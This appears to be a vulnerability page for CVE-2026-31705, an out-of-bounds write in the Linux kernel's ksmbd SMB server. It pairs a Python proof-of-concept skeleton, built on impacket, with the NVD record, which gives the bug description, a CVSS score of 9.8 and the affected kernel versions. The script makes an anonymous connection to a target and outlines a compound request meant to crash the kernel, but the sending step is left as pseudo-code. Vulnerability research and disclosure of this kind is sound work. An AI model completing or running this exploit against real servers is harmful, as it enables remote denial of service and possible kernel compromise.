CVE-2026-31705

/* * PoC Concept for CVE-2026-31705 * This script demonstrates how to trigger the OOB write by sending * a compound SMB request designed to exhaust the buffer space. * Requires impacket library. */ from impacket.smbconnection import SMBConnection from impacket.smb3structs import * import sys def trigger_oob(target, port=445): """Attempts to trigger the ksmbd OOB write vulnerability.""" # 1. Establish connection try: conn = SMBConnection(remoteName=target, remoteHost=target, sessPort=port) conn.login('', '') except Exception as e: print(f"[!] Connection failed: {e}") return print(f"[*] Connected to {target}") # 2. Setup Tree Connect tid = conn.connectTree('IPC$') # 3. Construct Compound Request # We need a READ command to consume buffer space, followed by QUERY_INFO # with a specific EA size to trigger buf_free_len == 0 condition. # Note: Actual offset calculation requires knowing the server's buffer size, # which is often 65535 or similar. This is a conceptual representation. # Packet 1: Large READ to consume buffer # Packet 2: QUERY_INFO with crafted EA # In a real exploit, you would manually craft the SMB2 packets bytes # to align the buffer precisely. print("[*] Sending malicious compound request...") # conn.sendCompound(...) - Pseudo-code for the actual packet crafting # 4. If successful, the server should crash due to Kernel OOB print("[*] Check server for crash/PoC verification.") conn.disconnect() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_ip>") else: trigger_oob(sys.argv[1])

{"cve": {"id": "CVE-2026-31705", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T14:16:20.473", "lastModified": "2026-05-06T20:45:44.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: fix out-of-bounds write in smb2_get_ea() EA alignment\n\nsmb2_get_ea() applies 4-byte alignment padding via memset() after\nwriting each EA entry. The bounds check on buf_free_len is performed\nbefore the value memcpy, but the alignment memset fires unconditionally\nafterward with no check on remaining space.\n\nWhen the EA value exactly fills the remaining buffer (buf_free_len == 0\nafter value subtraction), the alignment memset writes 1-3 NUL bytes\npast the buf_free_len boundary. In compound requests where the response\nbuffer is shared across commands, the first command (e.g., READ) can\nconsume most of the buffer, leaving a tight remainder for the QUERY_INFO\nEA response. The alignment memset then overwrites past the physical\nkvmalloc allocation into adjacent kernel heap memory.\n\nAdd a bounds check before the alignment memset to ensure buf_free_len\ncan accommodate the padding bytes.\n\nThis is the same bug pattern fixed by commit beef2634f81f (\"ksmbd: fix\npotencial OOB in get_file_all_info() for compound requests\") and\ncommit fda9522ed6af (\"ksmbd: fix OOB write in QUERY_INFO for compound\nrequests\"), both of which added bounds checks before unconditional\nwrites in QUERY_INFO response handlers."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.145", "versionEndExcluding": "5.16", "matchCriteriaId": "B98C9201-BF17-4E2C-84FF-75EE2AA94DC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.71", "versionEndExcluding": "6.2", "matchCriteriaId": "163E72B5-0F5D-49E2-AAEA-F11E02D730AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6", "versionEndExcluding": "6.6.136", "matchCriteriaId": "D1C8822E-08AF-49C3-8A31-F806E5FAE5E7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.84", "matchCriteriaId": "D4ECA0DE-AFF5-4688-B219-4CA2336CA5B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.25", "matchCriteriaId": "8B0A7E0E-F6D8-45DB-8CD9-01839FE40A6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "7.0.2", "matchCriteriaId": "1BD58F1E-7C20-4C0D-92A2-FAC5CBFBE8A8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/30010c952077a1c89ecdd71fc4d574c75a8f5617", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/790304c02bf9bd7b8171feda4294d6e62d32ae8f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/922d48fe8c19f388ffa2f709f33acaae4e408de2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/98f3de6ef4efbd899348d333f0902dc4ff14380c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ffbce350c6fd1e99116ea57383b9031717e36d3b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}